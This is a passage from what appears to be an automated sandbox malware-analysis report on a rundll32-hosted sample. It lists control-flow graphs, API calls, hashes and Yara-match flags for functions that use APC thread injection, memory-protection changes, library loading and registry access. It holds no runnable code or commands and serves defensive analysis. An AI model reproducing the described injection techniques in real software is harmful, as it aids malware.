195d8ab1cc4 180->183 181->54 185 195d8adc3ce-195d8adc3d7 182->185 186 195d8adc24b-195d8adc26f call 195d8ac374c 182->186 201 195d8adc124-195d8adc143 183->201 202 195d8adc116-195d8adc11c 183->202 185->60 189 195d8adc3dd-195d8adc3e2 185->189 196 195d8adc312-195d8adc333 call 195d8ac374c 186->196 197 195d8adc275-195d8adc295 call 195d8ad353c 186->197 192 195d8adc454-195d8adc482 call 195d8ab1cc4 189->192 193 195d8adc3e4-195d8adc3e7 189->193 192->179 207 195d8adc488-195d8adc48b 192->207 198 195d8adc3f9-195d8adc416 193->198 199 195d8adc3e9-195d8adc3f3 193->199 196->185 213 195d8adc339-195d8adc356 call 195d8ad353c 196->213 197->196 214 195d8adc297-195d8adc2a4 197->214 198->192 211 195d8adc418-195d8adc44a 198->211 199->198 215 195d8adc183-195d8adc1c8 201->215 216 195d8adc145-195d8adc17e call 195d8ac56d0 201->216 202->201 207->60 211->192 213->185 222 195d8adc358-195d8adc365 213->222 218 195d8adc300-195d8adc30a 214->218 219 195d8adc2a6-195d8adc2eb call 195d8ab62ec call 195d8ad7e04 214->219 228 195d8adc1ca-195d8adc1e7 call 195d8ab1cc4 215->228 229 195d8adc20b-195d8adc211 215->229 216->215 218->196 219->218 243 195d8adc2ed-195d8adc2fb call 195d8add734 219->243 225 195d8adc3bc-195d8adc3c6 222->225 226 195d8adc367-195d8adc3ae call 195d8ab62ec call 195d8ad7e04 222->226 225->185 226->225 251 195d8adc3b0-195d8adc3b7 call 195d8abd9f4 226->251 239 195d8adc1f0-195d8adc209 228->239 240 195d8adc1e9-195d8adc1ee 228->240 236 195d8adc213-195d8adc216 229->236 236->54 241 195d8adc21c-195d8adc227 236->241 239->236 240->236 241->185 244 195d8adc22d-195d8adc239 call 195d8ad2754 241->244 243->218 244->185 251->225
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateUser$MutexNameQueueThread
                                                          • String ID:
                                                          • API String ID: 2503873790-0
                                                          • Opcode ID: bd03c217eebf3514f0dc141ef06a426e4807aa03d6b913fdaf265373ad3cc355
                                                          • Instruction ID: 2a923d570d30774bedfe8b6b2ea18094f3f4f6ab0a60923af0e478ab31b6bc27
                                                          • Opcode Fuzzy Hash: bd03c217eebf3514f0dc141ef06a426e4807aa03d6b913fdaf265373ad3cc355
                                                          • Instruction Fuzzy Hash: 9472C771618E088FF759EFA8EC956A573E2F758710F10452ED54BD32A1EE34D842CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00000195D8AEF004, Relevance: 3.4, APIs: 2, Instructions: 353nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 306 195d8aef004-195d8aef06b 308 195d8aef071-195d8aef08a 306->308 309 195d8aef35b-195d8aef373 306->309 310 195d8aef090-195d8aef099 308->310 311 195d8aef255-195d8aef2a0 NtProtectVirtualMemory 308->311 316 195d8aef376-195d8aef388 309->316 310->311 315 195d8aef09f-195d8aef0a7 310->315 313 195d8aef33a-195d8aef33c 311->313 314 195d8aef2a6-195d8aef2a7 311->314 313->316 319 195d8aef33e-195d8aef359 313->319 317 195d8aef2ab-195d8aef2ad 314->317 318 195d8aef0aa-195d8aef0b6 315->318 317->316 320 195d8aef2b3-195d8aef2b7 317->320 321 195d8aef0d4-195d8aef102 318->321 322 195d8aef0b8-195d8aef0b9 318->322 319->316 323 195d8aef2cf-195d8aef2d3 320->323 324 195d8aef2b9-195d8aef2cd 320->324 331 195d8aef108-195d8aef119 321->331 332 195d8aef246-195d8aef247 321->332 325 195d8aef0bb-195d8aef0d2 322->325 328 195d8aef2eb-195d8aef2ec 323->328 329 195d8aef2d5-195d8aef2e9 323->329 327 195d8aef2ee-195d8aef334 NtProtectVirtualMemory 324->327 325->321 325->325 327->313 327->317 328->327 329->327 334 195d8aef12f-195d8aef14b 331->334 335 195d8aef11b-195d8aef120 331->335 333 195d8aef24c-195d8aef24f 332->333 333->311 333->316 337 195d8aef221-195d8aef224 334->337 338 195d8aef151-195d8aef18f 334->338 335->334 336 195d8aef122-195d8aef12a 335->336 340 195d8aef22a-195d8aef23e 336->340 337->316 337->340 343 195d8aef191-195d8aef199 338->343 344 195d8aef1b8-195d8aef1d8 338->344 340->318 342 195d8aef244 340->342 342->333 345 195d8aef1a4-195d8aef1b5 343->345 346 195d8aef19b-195d8aef1a2 343->346 348 195d8aef1dd-195d8aef1df 344->348 349 195d8aef1da 344->349 345->344 346->345 346->346 350 195d8aef213-195d8aef21c 348->350 351 195d8aef1e1-195d8aef203 348->351 349->348 350->337 351->337 352 195d8aef205-195d8aef20e 351->352 352->338
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.756043253.00000195D8AEF000.00000040.00020000.sdmp, Offset: 00000195D8AEF000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8aef000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: eafab29160fceb955bbbcbe4a5a32561ec8a2626c215229b8f1f7ae10943d3c5
                                                          • Instruction ID: cd2f61a479eb35b622b1642637931f3adf99ea22ce310edb41b881df0d191a16
                                                          • Opcode Fuzzy Hash: eafab29160fceb955bbbcbe4a5a32561ec8a2626c215229b8f1f7ae10943d3c5
                                                          • Instruction Fuzzy Hash: AAB10631308B884FE766DF68D8917E9B3E2FB95320F5449ADD58FC3292D734A4068742
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00000195D8ADB230, Relevance: 1.8, APIs: 1, Instructions: 286memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateHeap
                                                          • String ID:
                                                          • API String ID: 10892065-0
                                                          • Opcode ID: b79121b0bf9300899778867a254ee6e6f699830a218d847d70ca451a66ee4414
                                                          • Instruction ID: 30574790a01222e83df61b7976aa11c9843cc68924407830bb781d98fafe9b7d
                                                          • Opcode Fuzzy Hash: b79121b0bf9300899778867a254ee6e6f699830a218d847d70ca451a66ee4414
                                                          • Instruction Fuzzy Hash: F891D570608F098FF759DF68DC587AA33E6FB94321F05452ED54AD32A1EE78D8028B42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00000195D8ACE860, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 1a5ec96146b37ae29432bfa8ac23ac72cbb7241fa644212a0b5fd835a5577e33
                                                          • Instruction ID: 64c9f8db09c103ef7142d22031c3ed03d409d7f06787ab0f783b58c73d7d0a43
                                                          • Opcode Fuzzy Hash: 1a5ec96146b37ae29432bfa8ac23ac72cbb7241fa644212a0b5fd835a5577e33
                                                          • Instruction Fuzzy Hash: 3E01A230214E0C8FFB94DFA9C8D4AA573E2FBA8315F94046EA50DD3194D738D891C702
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00000195D8AC2A8C, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Value$CloseCreateQuery
                                                          • String ID: ($(
                                                          • API String ID: 409396109-222463766
                                                          • Opcode ID: 15c0657e6459d840dfd1ed2d718bab6897b6f36c0ec807a258d29cf25e484d4a
                                                          • Instruction ID: f4354f470d00e9ebab5fd5518bfc8bb836d79eb4ce78b9b48f299b83108d89a0
                                                          • Opcode Fuzzy Hash: 15c0657e6459d840dfd1ed2d718bab6897b6f36c0ec807a258d29cf25e484d4a
                                                          • Instruction Fuzzy Hash: F931D234218F088FF364EF58E8687A6B7E6FB98315F14052DE44DC32A1EB789846C706
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00000195D8AD353C, Relevance: 4.6, APIs: 3, Instructions: 96registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: QueryValue$Close
                                                          • String ID:
                                                          • API String ID: 1979452859-0
                                                          • Opcode ID: 51d92207df379dc83875e3aa58fb36a40af9c9bbd6bc0580ad4ef2799a51313c
                                                          • Instruction ID: a7250e9f3ac9ab620afd2c0abd3f0254d743ece86c522ba5581c25bc8e3b67fb
                                                          • Opcode Fuzzy Hash: 51d92207df379dc83875e3aa58fb36a40af9c9bbd6bc0580ad4ef2799a51313c
                                                          • Instruction Fuzzy Hash: 3A216D70618B088FE758EF68E899765B7E1FB98311F10442EE44ED3261EB34D841CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00000195D8ADF980, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 254 195d8adf980-195d8adf9fd 255 195d8adfa24-195d8adfa50 254->255 256 195d8adf9ff-195d8adfa1f 254->256 257 195d8adfa52-195d8adfa64 255->257 258 195d8adfa66-195d8adfa6a 255->258 261 195d8adfc56-195d8adfc6d 256->261 260 195d8adfa6e-195d8adfa7a 257->260 258->260 262 195d8adfa7c-195d8adfa8b 260->262 263 195d8adfa98-195d8adfa9b 260->263 275 195d8adfa91-195d8adfa92 262->275 276 195d8adfc2c-195d8adfc36 262->276 264 195d8adfaa1-195d8adfaa4 263->264 265 195d8adfb6f-195d8adfb77 263->265 266 195d8adfab8-195d8adfac9 LoadLibraryA 264->266 267 195d8adfaa6-195d8adfab6 264->267 268 195d8adfb79-195d8adfb86 265->268 269 195d8adfb88-195d8adfb8b 265->269 271 195d8adfb23-195d8adfb2d 266->271 272 195d8adfacb-195d8adfadf 266->272 267->266 267->271 268->269 273 195d8adfb91-195d8adfb94 269->273 274 195d8adfc28-195d8adfc29 269->274 283 195d8adfb5f-195d8adfb60 271->283 284 195d8adfb2f-195d8adfb33 271->284 290 195d8adfaf3-195d8adfb1e 272->290 291 195d8adfae1-195d8adfaf1 272->291 281 195d8adfbbf-195d8adfbd3 273->281 282 195d8adfb96-195d8adfb99 273->282 274->276 275->263 277 195d8adfc53-195d8adfc54 276->277 278 195d8adfc38-195d8adfc4d 276->278 277->261 278->277 281->274 295 195d8adfbd5-195d8adfbe9 281->295 282->281 288 195d8adfb9b-195d8adfba6 282->288 285 195d8adfb68-195d8adfb69 283->285 284->285 286 195d8adfb35-195d8adfb46 284->286 285->265 286->285 297 195d8adfb48-195d8adfb5d 286->297 288->281 292 195d8adfba8-195d8adfbad 288->292 290->261 291->271 291->290 292->281 293 195d8adfbaf-195d8adfbb4 292->293 293->281 296 195d8adfbb6-195d8adfbbd 293->296 301 195d8adfbeb-195d8adfbf6 295->301 302 195d8adfbf8-195d8adfbfb 295->302 296->274 296->281 297->285 301->302 302->274 303 195d8adfbfd-195d8adfc24 302->303 303->274
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: H
                                                          • API String ID: 1029625771-2852464175
                                                          • Opcode ID: c49a4acf7bc8f46f379732404cbf2cd9fd691122b626915b3cf3683113567aa9
                                                          • Instruction ID: 0b25a6faad0959eb4f0a893d8827cdf2a14175479c8bb978c9bb07f791eb0938
                                                          • Opcode Fuzzy Hash: c49a4acf7bc8f46f379732404cbf2cd9fd691122b626915b3cf3683113567aa9
                                                          • Instruction Fuzzy Hash: F5A16E30508F098FF765DF98D8987A677E2FB98315F04462AD94AC72A1FB34D941CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00000195D8AB6A94, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 222stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 353 195d8ab6a94-195d8ab6ae7 355 195d8ab6aed-195d8ab6af0 353->355 356 195d8ab6c88 353->356 358 195d8ab6af2-195d8ab6af8 355->358 357 195d8ab6c8d-195d8ab6ca3 356->357 359 195d8ab6afa-195d8ab6afd 358->359 360 195d8ab6b49-195d8ab6b4b 358->360 363 195d8ab6aff-195d8ab6b02 359->363 364 195d8ab6b2d-195d8ab6b2f 359->364 361 195d8ab6b4d-195d8ab6b52 360->361 362 195d8ab6b55-195d8ab6b58 360->362 361->362 367 195d8ab6c6f 362->367 368 195d8ab6b5e-195d8ab6b80 362->368 363->364 369 195d8ab6b04-195d8ab6b06 363->369 365 195d8ab6b31-195d8ab6b39 364->365 366 195d8ab6b3b-195d8ab6b3c 364->366 365->366 371 195d8ab6b3f-195d8ab6b47 366->371 370 195d8ab6c74-195d8ab6c86 367->370 377 195d8ab6c68-195d8ab6c6d 368->377 378 195d8ab6b86-195d8ab6b93 368->378 372 195d8ab6b28-195d8ab6b2b 369->372 373 195d8ab6b08-195d8ab6b0b 369->373 370->357 371->358 371->360 372->371 373->362 375 195d8ab6b0d-195d8ab6b18 373->375 379 195d8ab6b1d-195d8ab6b25 375->379 380 195d8ab6b1a 375->380 377->370 381 195d8ab6c5b-195d8ab6c66 378->381 382 195d8ab6b99-195d8ab6b9f 378->382 379->372 380->379 381->370 383 195d8ab6ba1-195d8ab6bf5 382->383 386 195d8ab6c2f-195d8ab6c50 383->386 387 195d8ab6bf7-195d8ab6bf8 383->387 386->383 394 195d8ab6c56-195d8ab6c57 386->394 388 195d8ab6bfa-195d8ab6c09 lstrcmp 387->388 389 195d8ab6c27 388->389 390 195d8ab6c0b-195d8ab6c23 388->390 393 195d8ab6c2a-195d8ab6c2b 389->393 390->388 392 195d8ab6c25 390->392 392->393 393->386 394->381
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcmp
                                                          • String ID:
                                                          • API String ID: 1534048567-3916222277
                                                          • Opcode ID: 1b8dc8031022306e9345a288fd45bae1e1a689bceeb25608fd9f1601aeb3c630
                                                          • Instruction ID: b9691e66209deb9b7cb4a9b3772b9cb4dc1574fd72681434476f70a882ae6ba5
                                                          • Opcode Fuzzy Hash: 1b8dc8031022306e9345a288fd45bae1e1a689bceeb25608fd9f1601aeb3c630
                                                          • Instruction Fuzzy Hash: D5513B71618E084BF729AE5C9C962B977D2F789321F18013DDACED3291D925AC4287C3
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00000195D8ACA524, Relevance: 3.2, APIs: 2, Instructions: 202memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: e79ce0048b4222cfd954818e7e7d674908e08b84fbf51762638f79b308669b1e
                                                          • Instruction ID: d94d53b680c711cd5f5bbb921d895740fe4e0af7e790d316ef91f0f37da55ff6
                                                          • Opcode Fuzzy Hash: e79ce0048b4222cfd954818e7e7d674908e08b84fbf51762638f79b308669b1e
                                                          • Instruction Fuzzy Hash: 0061B070218F098FE744EF69D8997A5B7E1FB58310F14456EE54ED32A1DB34E880CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00000195D8ABA4DC, Relevance: 3.1, APIs: 2, Instructions: 147COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ContinueHandlerVectored
                                                          • String ID:
                                                          • API String ID: 3758255415-0
                                                          • Opcode ID: 5cfdce6ba604bbcc091d7b921d4918bbcddbfb62c8266db36f703a1fb59b6e8d
                                                          • Instruction ID: f438cbbaa44e9b6d20671c884f3268468f3c04fc47c7205b85319845ffa94f51
                                                          • Opcode Fuzzy Hash: 5cfdce6ba604bbcc091d7b921d4918bbcddbfb62c8266db36f703a1fb59b6e8d
                                                          • Instruction Fuzzy Hash: 34510C30608E068FF765EF6894643BA77F3EB58361F14413E954AD32A1DF78E5028B02
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00000195D8AC374C, Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateOpen
                                                          • String ID:
                                                          • API String ID: 436179556-0
                                                          • Opcode ID: 3a96c24ec20924aeac69af3be795014768ecc2de191383b8bce9cd8f3f8db1b1
                                                          • Instruction ID: 5f2bd6ab8f4cf11aa73587af21d1b08b4113e04547d541083f448d0a364f86be
                                                          • Opcode Fuzzy Hash: 3a96c24ec20924aeac69af3be795014768ecc2de191383b8bce9cd8f3f8db1b1
                                                          • Instruction Fuzzy Hash: 10110830608B058FEB55EB4C949476AB7E1EBAC315F14002EE98DD33A0DA74C8418743
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00000195D8AB1CC4, Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 474 195d8ab1cc4-195d8ab1d00 CreateThread 475 195d8ab1d02-195d8ab1d13 QueueUserAPC 474->475 476 195d8ab1d3b-195d8ab1d4d 474->476 475->476 477 195d8ab1d15-195d8ab1d33 475->477 477->476
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateQueueThreadUser
                                                          • String ID:
                                                          • API String ID: 3600083758-0
                                                          • Opcode ID: 36f65ecab13cfc995b4b55937e947feb4e6208ee9d24dec18057a5403e22070c
                                                          • Instruction ID: 852fa8c9c592e43edc34fc1dd4780356d7ba4d3fd89da23c746ec3f02360370d
                                                          • Opcode Fuzzy Hash: 36f65ecab13cfc995b4b55937e947feb4e6208ee9d24dec18057a5403e22070c
                                                          • Instruction Fuzzy Hash: 80012D30714A094FEBA4EF6DA84D63977F2F798351B24457AA409C3270DE78DC428B82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00000195D8AB7E0C, Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: a106af5d0ced5a47d6bcdf0535ea1047a1c970f0eef90624918c376d659d4d5b
                                                          • Instruction ID: 44399eb08dddb732434bfa146f0cd1874452d2de2b3602fa952a492b077bd7de
                                                          • Opcode Fuzzy Hash: a106af5d0ced5a47d6bcdf0535ea1047a1c970f0eef90624918c376d659d4d5b
                                                          • Instruction Fuzzy Hash: 0E619270518E098FF795EF68D499AA573E1FB68311F14451EE94EC3251EB70EC41CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00000195D8AC98FC, Relevance: 1.7, APIs: 1, Instructions: 162COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: BoundaryDeleteDescriptor
                                                          • String ID:
                                                          • API String ID: 3203483114-0
                                                          • Opcode ID: 26bc7b7e104518ddba554de4156c252715addc58dba5be73b5a25652a6bd6292
                                                          • Instruction ID: 0e24acec0b2195606470922ac1fec5d2032f0c8c4a6da09941c3c8d01f682bbc
                                                          • Opcode Fuzzy Hash: 26bc7b7e104518ddba554de4156c252715addc58dba5be73b5a25652a6bd6292
                                                          • Instruction Fuzzy Hash: E041B530618E5C8FFB95DF98D894AE573E2F759320F58412AE10EC32A6DA64DC46C782
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00000195D8ADE4A4, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00000195D8AC374C: RegCreateKeyA.ADVAPI32(?,?,?,00000195D8ADDCD3), ref: 00000195D8AC376F
                                                          • RegQueryValueExA.KERNELBASE ref: 00000195D8ADE508
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateQueryValue
                                                          • String ID:
                                                          • API String ID: 2711935003-0
                                                          • Opcode ID: 535672abe70d0168ee810ee176c23215db19a3ba1e8f58e6fcab72b62e0214ff
                                                          • Instruction ID: e60157321071814d761b89183ecf161278e6f300de28c4113fb2ef36dbf2c84a
                                                          • Opcode Fuzzy Hash: 535672abe70d0168ee810ee176c23215db19a3ba1e8f58e6fcab72b62e0214ff
                                                          • Instruction Fuzzy Hash: 14212170618B488FF781EF68D458B9AB7E1FB98354F400929A48AD3351EB78D940CB43
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00000195D8AD8D98, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 3f038f664194ed09418985c20b287aca218c62dbb155e60d2d7415b02c667552
                                                          • Instruction ID: bfcf69a9451a9a7dbffb3ff7e9751946d9a9eb2405b6cb5cef588099c9ce1e31
                                                          • Opcode Fuzzy Hash: 3f038f664194ed09418985c20b287aca218c62dbb155e60d2d7415b02c667552
                                                          • Instruction Fuzzy Hash: 5111AF3060CB088FEB48EF59A845565B7E5FB98310B04462DE98EC7345FE70E9058B87
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00000195D8ABA9A0, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, Offset: 00000195D8AB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_40_2_195d8ab1000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID:
                                                          • API String ID: 2591292051-0
                                                          • Opcode ID: 5e627e4eeb0547a02e045b33c94f03be2364a689ea05fb59daad38687b791655
                                                          • Instruction ID: 989fa9c7cb64ad2e96c1c5402ec702e1349b96b9aafee29b500eb4b76a0d139a
                                                          • Opcode Fuzzy Hash: 5e627e4eeb0547a02e045b33c94f03be2364a689ea05fb59daad38687b791655
                                                          • Instruction Fuzzy Hash: CCF04F31318F454BFB98DF69D498B6AB2E2EBD8312F48162DB54AC3250DB78E8454742
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions